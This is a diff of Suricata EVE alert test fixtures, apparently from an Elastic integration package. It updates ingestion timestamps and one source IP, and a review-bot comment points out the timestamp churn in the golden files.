"00:03:2d:3f:e5:63", "packets": 6 }, @@ -58,7 +63,7 @@ "testmynids.org" ], "ip": [ - "52.222.141.99" + "175.16.199.1" ] }, "http": { 
@@ -96,8 +101,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.050858Z", - "original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"52.222.141.99\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"created_at\":[\"2010_09_23\"],\"updated_at\":[\"2010_09_23\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", + "ingested": "2021-12-09T13:45:19.608432300Z", + "original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"175.16.199.1\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad 
Traffic\",\"severity\":2,\"metadata\":{\"created_at\":[\"2010_09_23\"],\"updated_at\":[\"2010_09_23\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", "start": "2021-01-22T22:28:38.673Z", diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json index 70e0c3183f3..cfc6a2e50d1 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json 
@@ -80,7 +80,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.312580300Z", + "ingested": "2021-12-09T13:45:19.996624600Z", "original": "{\"timestamp\":\"2018-10-03T14:42:44.836744+0000\",\"flow_id\":2191386088856669,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32858,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.net\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T14:42:44.613469+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
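Review bot: The `ingested` line is the only change in this hunk, and the same wall-clock churn repeats in every following hunk of test-eve-alerts.log-expected.json on this page (`@@ -182` through `@@ -2284`) and in the `@@ -96,8 +101,8 @@` hunk of test-eve-6-0.log-expected.json, where it sits next to the one line that actually matters, the `original` string carrying the new source IP. A regeneration timestamp inside a golden file turns every future fixture refresh into a noisy diff and makes a genuine pipeline regression harder to spot in review. If the elastic-package version this repo pins supports it, declaring the field as dynamic in the test's `-config.yml`, e.g. `dynamic_fields: {event.ingested: ".*"}`, would let the comparison ignore it; worth confirming rather than assuming. The enclosing `event` object starts and ends outside each of these hunks.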
@@ -182,7 +182,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.312602700Z", + "ingested": "2021-12-09T13:45:19.996633900Z", "original": "{\"timestamp\":\"2018-10-03T16:16:26.711841+0000\",\"flow_id\":678269478904081,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32864,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.net\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:16:26.467217+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -284,7 +284,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.312609300Z", + "ingested": "2021-12-09T13:45:19.996640100Z", "original": "{\"timestamp\":\"2018-10-03T16:44:50.813100+0000\",\"flow_id\":1170030461115650,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32870,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.net\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1126},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:44:50.580866+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -386,7 +386,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.312614800Z", + "ingested": "2021-12-09T13:45:19.996646Z", "original": "{\"timestamp\":\"2018-10-03T16:45:09.267308+0000\",\"flow_id\":49628113637132,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32872,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.org\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:45:09.036620+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -488,7 +488,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.312619700Z", + "ingested": "2021-12-09T13:45:19.996652100Z", "original": "{\"timestamp\":\"2018-10-03T16:45:34.481113+0000\",\"flow_id\":116307482565223,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32876,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.org\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:45:34.252519+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -590,7 +590,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:43.312624500Z", + "ingested": "2021-12-09T13:45:19.996658Z", "original": "{\"timestamp\":\"2018-10-03T17:02:38.900976+0000\",\"flow_id\":1205867738178946,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32892,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.org\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1126},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T17:02:38.599426+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -691,7 +691,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312642100Z", + "ingested": "2021-12-09T13:45:19.996663900Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.009897+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1138},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":497,\"bytes_toclient\":1654,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -795,7 +795,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312651100Z", + "ingested": "2021-12-09T13:45:19.996669800Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.168340+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":304,\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":487,\"bytes_toclient\":417,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -899,7 +899,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312657800Z", + "ingested": "2021-12-09T13:45:19.996675700Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.288862+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":1,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2601},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":842,\"bytes_toclient\":3445,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1003,7 +1003,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312664900Z", + "ingested": "2021-12-09T13:45:19.996681500Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.289324+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":1,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/main\\/source\\/by-hash\\/SHA256\\/f5ec03d97ca76c98162d9233c8b7c578c52897e2136428277baf2e7b633a8e72\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1241},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":64,\"pkts_toclient\":62,\"bytes_toserver\":4810,\"bytes_toclient\":90543,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1107,7 +1107,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312670200Z", + "ingested": "2021-12-09T13:45:19.996687400Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.356132+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":2,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/main\\/binary-amd64\\/by-hash\\/SHA256\\/c5b8346a3221bc9a23a79ba4dc4e730a6319a77fc9d63872dfc56539a0810015\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":87,\"pkts_toclient\":98,\"bytes_toserver\":6591,\"bytes_toclient\":145014,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1211,7 +1211,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312675300Z", + "ingested": "2021-12-09T13:45:19.996693700Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.456919+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":3,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/universe\\/binary-amd64\\/by-hash\\/SHA256\\/e5cc957139a25a0fee47cbf2c0fac8ad5cab50346d6a74abe031748924c5b558\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2688},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":156,\"pkts_toclient\":221,\"bytes_toserver\":11460,\"bytes_toclient\":330525,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1315,7 +1315,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312680Z", + "ingested": "2021-12-09T13:45:19.996699600Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.747122+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":2,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-backports\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2601},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":64,\"pkts_toclient\":67,\"bytes_toserver\":4895,\"bytes_toclient\":96554,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1419,7 +1419,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312684700Z", + "ingested": "2021-12-09T13:45:19.996705700Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.953886+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":3,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/main\\/source\\/by-hash\\/SHA256\\/65f2e3a4e9d89d9d4b5e3d42e586bc96f48a24466b0ad0b4a707255e44a26b03\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":91,\"pkts_toclient\":119,\"bytes_toserver\":6932,\"bytes_toclient\":174843,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1523,7 +1523,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312689300Z", + "ingested": "2021-12-09T13:45:19.996711700Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.250560+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":4,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/universe\\/source\\/by-hash\\/SHA256\\/56cfd9cc2efa61dff7428dddf921c3cd6047ab8e6484a7f1888e4c3f7252f1ef\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2688},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":159,\"pkts_toclient\":253,\"bytes_toserver\":11679,\"bytes_toclient\":376452,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1627,7 +1627,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312693700Z", + "ingested": "2021-12-09T13:45:19.996715200Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.401788+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":5,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/main\\/binary-amd64\\/by-hash\\/SHA256\\/4360137dc8f98b47648da1fef5472ef234fb02115bc2b29873bcaeee62637e70\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":190,\"pkts_toclient\":314,\"bytes_toserver\":13986,\"bytes_toclient\":468170,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1731,7 +1731,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312697900Z", + "ingested": "2021-12-09T13:45:19.996720200Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.776438+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":6,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/restricted\\/binary-amd64\\/by-hash\\/SHA256\\/c93fdc7f10cad1263349fd7b5bdd6a7f7163165b96ad263b3e12022e319d0d12\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2691},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":328,\"pkts_toclient\":588,\"bytes_toserver\":23361,\"bytes_toclient\":880323,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1835,7 +1835,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312702200Z", + "ingested": "2021-12-09T13:45:19.996725700Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.897009+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":7,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/universe\\/binary-amd64\\/by-hash\\/SHA256\\/5190f7afbee38b3cb32225db478fdbabd46f76eaa9c5921a13091891bf3e9bbc\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":330,\"pkts_toclient\":591,\"bytes_toserver\":23758,\"bytes_toclient\":884342,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1938,7 +1938,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312707200Z", + "ingested": "2021-12-09T13:45:19.996731200Z", "original": "{\"timestamp\":\"2018-10-04T09:35:01.362208+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":8,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/universe\\/i18n\\/by-hash\\/SHA256\\/9fe539b7036e51327cd85ca5e0a4dd4eb47f69168875de2ac9842a5e36ebd4a4\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":524,\"pkts_toclient\":979,\"bytes_toserver\":36819,\"bytes_toclient\":1467603,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
